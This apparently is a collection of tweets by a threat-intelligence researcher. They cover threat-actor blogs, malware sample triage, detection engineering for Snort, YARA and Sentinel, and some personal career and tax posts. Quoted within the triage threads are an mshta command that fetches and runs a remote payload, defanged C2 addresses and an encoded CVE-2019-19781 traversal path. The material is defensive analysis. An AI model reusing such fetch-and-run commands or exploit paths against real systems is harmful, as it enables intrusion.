We've been tracking DEV-0537 since 2021 (overlaps: Lapsus$, UNC3661). Here's a comprehensive 🆕 BLOG 📰 covering observed TTPs: microsoft.com/security/blog/…

#MSTIC and Defender threat intel collab
➕#DART 👻 incident response team experience from the trenches [1/3] The blog highlights varied initial access vectors and a slew of [inconsistent?] end goals: data theft, extortion, chaos...

One way to interpret "this actor's TTPs and infrastructure are constantly changing" is that they are loosely-organized (see:

https://twitter.com/ItsReallyNick/status/1394483035156983808

) [2/3]

So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover?

Start here: fireeye.com/blog/threat-re… 🤩

But then what?? Let’s talk about some post-compromise techniques... Please read the above blog to appreciate multiple backdoors used, careful & unique tradecraft used on-premise...

We just published more details on what we’ve been finding post-compromise: blogs.microsoft.com/on-the-issues/…
ADFS key material compromise, SAML shenanigans, OAuth keys added...

Added #STRONTIUM election-related credential harvesting campaign "detection" to #AzureSentinel: github.com/Azure/Azure-Se…

Yes - it's hardcoded for netblocks released in the #MSTIC report (microsoft.com/security/blog/…)
This is just extra coverage on top of existing cred harvesting logic That said, the logic posted there finds some high fidelity #STRONTIUM campaigns from at least June through... recently (more details in above blog).

You'll see a User-Agent, first/last attempt, # of total attempts, # of unique IPs & unique accounts attempted + a list of accounts

Pokéregex Challenge:
How many of the 719 Pokémon can you capture in a single regular expression that fits in a tweet?

Here's what to match: gist.githubusercontent.com/itsreallynick/…

Here are awesome regex resources: raw.githubusercontent.com/aloisdg/awesom… [this same text blob will also be used to measure FPs😊] If you haven't done something like this before, here's a [crappy] bash one-liner to start:

sh -c 'pattern="your|regex"; echo 🎯 Pokémon:; curl -s gist.githubusercontent.com/itsreallynick/… | grep -ioE $pattern | wc -l; echo 🚯 Noise:; curl -s github.com/aloisdg/awesom… | grep -ioE $pattern | wc -l'

I started playing Pokémon Go with my kids at the start of the COVID-19 pandemic.

I can’t believe how many #infosec Pokémon we’ve caught so far.

Here’s a quick thread – please add since I’m missing many.

First up: I definitely appreciate that they included #FIN7 in this game That last one was much harder to capture than these Iranian TTP Pokémon.

🆕 Job Update: I'm joining @Microsoft!

On the #MSTIC R&D team:
☁️🏹hunting & investigations in the cloud (#AzureSentinel, @Office365)
🎯✍️🏽writing detections for several platforms
👥🎁community-based research & sharing
🛡️🤲🏽protecting those who need it the most #DefendingDemocracy Honored to work for @JohnLaTwC & @LeahLease
I'm pumped to grow with & learn from so many amazing security engineers and analysts in #MSTIC: twitter.com/i/lists/112798… #FF

My new East Coast crew includes the #APT hunters in Reston, @Cyb3rWard0g, and some random @cglyer guy 😅

Also:

OK so this is my last week at @Mandiant / @FireEye 😢

Here's the truth:
♥️ Joining Mandiant was the best decision of my career – the people & company have been SO good to me
🧠 Many of the brilliant minds in security are here & we have FUN every day

1/8 💻🔍 There is no better professional #infosec experience than responding to the intrusions that matter & defending at-scale alongside awesome people. If you have the chance to work here – .
🗓️ One year here is worth many more in experience. So here are some highlights:
2/8

🧾Stock Tax Tip
For years, I've seen teammates pay double taxes on stock grants. And *many* individuals & tax advisors prepare it incorrectly. ☹️

If you're fortunate enough to have sell-to-cover Restricted Stock Unit (RSU) grants – this probably needs adjusted.

Here's the fix: There may be a tiny caveat in your broker's documentation suggesting you will be double taxed. I heard it was due to a rule change in 2014 (sfgate.com/business/netwo…).

Pictured: the single note in an eTrade PDF.

The impact can be several thousands of dollars overpaid each year...

🧐Fascinating .XLS file just uploaded to VT: virustotal.com/gui/file/64a23…
In addition to some wild 🈸️Chinese phrase translations, its macros drop an [InternetShortcut] file to disk:
网址导航.url
The shortcut's URL (stored within Sheet2) is this GIF⤵️ of how to launch the .xls file Screenshots:
1⃣ - 🩳✂️: ThisWorkbook macro dropping the instructional GIF .url to disk
2⃣- 🌐🖼️: Sheet2 contains the .url shortcut's remote GIF location
3⃣ - 🚗🏃🏽: tdole macro allowing helpful translation spreadsheet to auto-run

🧵More .URL shortcuts:

https://twitter.com/ItsReallyNick/status/1176336528970276864?s=20

3 of these XLSMs uploaded to VT in last 2 days. Fresh one from this afternoon: virustotal.com/gui/file/fc243…
❔Interview question: is this “malware” & why do you say that? If your job was to decide whether to let it through, alert, or block it globally – what’s your pick? [polls below] 👆🏼Is this “malware” & why? <replies welcome>

Always nice when a payload has robust documentation.
This one details the exact bypasses implemented.

Version control shows 2016 @Cneelis method replaced with that @_RastaMouse new new.

👉🏽 "Program.cs" #InstallUtil payload with 0 VT detections btw: virustotal.com/gui/file/9193b… @Cneelis @_RastaMouse Uploaded 4 hours ago. (🆕)
0/60 static detections is *sorta* expected - it'd be interesting to see how security tech performs when this is loaded by #InstallUtil - should be caught then.

Anyway, great payload comments! [more pictured]

"salesforce.docx" uploaded yesterday
Low static detection (4/60): virustotal.com/gui/file/17f73…
Embedded executable "salesforce_report.exe"
• election-themed PE data
• CMSTPLUA UAC bypass
• probably #Trickbot 🤹🏽‍♂️🤖
• comms with: 181.112.157[.]42:449 (that cert 👀) & 193.26.217[.]243 "salesforce.docx"
MD5: ab284dccb09484ff6a3a116152edcb75

"salesforce_report.exe"
MD5: 3e0aff10a361a752ab160228410f2432
<Not on VT>
I've shared here:
• @anyrun_app: app.any.run/tasks/02c2ef89…
• @virusbay_io: beta.virusbay.io/sample/browse/…

🔥 "Hacking Tracking Pix & Macro Stomping Tricks"
📺 pscp.tv/FireEye/1djGXQ…

On this 🆕 #StateOfTheHack, @cglyer👨🏼‍🦲 & I break down trendy tradecraft.

Special guests:
👨🏻 Macro stomping (@a_tweeter_user)
👨🏻‍🦱 CVE exploitation in the trenches (@_bromiley)

👇🏼Episode Recap Thread! 🧵 We start with tracking pixels: ◻️ <spacer.gif>
We break down how marketing tools are used by attackers looking to learn more about their planned victim's behavior and system - prior to sending any first stage malware.
For some background, see this thread:

https://twitter.com/cglyer/status/1222255759687372801

Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching:

mshta http:\\pastebin[.]com\raw\JF0Zjp3g
⚠️ note: simple backslash URL trick
💆 know: "4D 5A" (MZ)

🔚 Result:
#RevengeRAT on https://paste[.]ee/r/OaKTX
C2: cugugugu.duckdns[.]org You should process these at scale and - outside of training - it's not a good use of time to step through them manually.

👨‍💻btw if you like network infrastructure triage, that DuckDNS C2 resolves to an IP address with :3389 open, serving up an SSL certificate exposing a hostname.

In response to increased U.S.-Iran tensions & concerns of retaliatory cyber attacks, Iranian intrusion experts @sj94356 & @QW5kcmV3 are on #StateOfTheHack for the latest on all things Iran: #APT33 #APT34 #APT35 #APT39 #MuddyWater & active UNC groups 🇮🇷👨‍💻🕵️‍♂️

https://twitter.com/FireEye/status/1218246639367798785

@sj94356 @QW5kcmV3 Wait, did @YouTube remove the #StateOfTheHack episode? 👉feye.io/soth 👀
Are we being oppressed? Do they think this is a U.S.-Iran influence operation? ... is it? 🇺🇸🇮🇷Am I going to get a bunch of weird #MAGA replies to this tweet? I have so many questions 😅🙃

For flowbits in @snort 🐷, order matters:

In Suricata, flowbits:isset is checked after the fast pattern match but before other content matches.

In Snort, flowbits:isset is checked in the order it appears in the rule, from left to right.

Source: suricata.readthedocs.io/en/latest/rule… @snort I really like using flowbits for exploitation attempts & responses.
I started doing this when tackling those massive #Struts vulns. And today we explained how to use them for CVE-2019-19781: fireeye.com/blog/products-…

🚨 New blog with @_bromiley on CVE-2019-19781 - "I Promise It'll Be 200 OK", covering:
• ASCII encoding trick evading most (all?) public rules /.%2e/%76pns/ 👀
• @snort 🐷 #detection tricks (negative distance, exploitation flowbits)
👉🔗 fireeye.com/blog/products-…
• #DFIR tips ⤵️ @_bromiley @snort @mpgn_x64 @TrustedSec @4real_br4nd4n @BakedSec @sans_isc @FireEye @Mandiant Blog contains a sampling of CVE-2019-19781 post-compromise activity: fireeye.com/blog/products-…

Quick & dirty #DFIR searches (use zgrep) in /var/log/
httpaccess.* : 'GET.*\.xml HTTP/1\.1\" 200' [use -B 1]
httpaccess.* : '/vpn/\.\./'
bash.* : 'nobody'

#InstallUtil payloads are still very popular for code execution and app whitelisting bypass.

Here's a fresh sample with a #GRUNT payload: "compliancesignature.cs"
MD5: f55c0c165f30df6d92fbb50bf7688dc5
virustotal.com/gui/file/1db94…
0/59 static detections.
So I'll share some rules!
👇👇 Identify suspicious #InstallUtil code execution payloads with a syntax-based #Yara rule (gist.github.com/itsreallynick/…) from this thread (

https://twitter.com/ItsReallyNick/status/1196848668097339392?s=20

) on a *pretty damn similar* sample 🧐

Also look closely at both samples' embedded PE information (Original/InternalName) 😉

🔨A Tough Outlook for Home Page Attacks
🔗fireeye.com/blog/threat-re…
Blog has #APT33 🇮🇷, #APT34 🇮🇷, and #UNC1194 🏴󠁵󠁳󠁯󠁨󠁿😉 home page persistence & RCE.
🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide!
😱Cool TTPs (pictured) #GuardrailsOfTheGalaxy Here is the #UNC1194 first stage (recon) payload stored in an attacker-controlled @Azure storage blob:

https://twitter.com/itsreallynick/status/1199209513137688576

Pretty neat that the attacker (@TrustedSec) can conduct a full intrusion by just swapping the storage blob content for the next stage!

How to tell that the ridiculously overcomplicated VBA macro function you're staring at is maybe just rolling its own Base64: accounting for padding

Decoded @digitalocean server: 178.128.141.18:8080

👨🏼‍🎓"Classeur1.xlsm" (7/58): virustotal.com/gui/file/70b86…
Uploaded from Tunis, 🇹🇳
[1/3] It's reasonable to expect an aspiring detection engineer to explain what's going on here.

CREATE_HEX function: MCAFEE_CERTIFICATION 👀
You should know what |4d 5a| means.

You should be able to explain the rudimentary D1, D2, and D3 evasion functions.
[2/2]

Just in time for the holidays: #StateoftheHack swag 🖱️👕

You'll never look better enabling those macros. #DailyWoolDrop 😉
customink.com/fundraising/st… Most recent order: 3 shirts 👕
with the anonymous message: “Just in time to gift one to Hass, Jimbo, and Oleg, your comrade Andy.” 😂
#FIN7 / Combi Security shirt order extended until tomorrow, #CyberMonday2019: customink.com/fundraising/st… Final cutoff.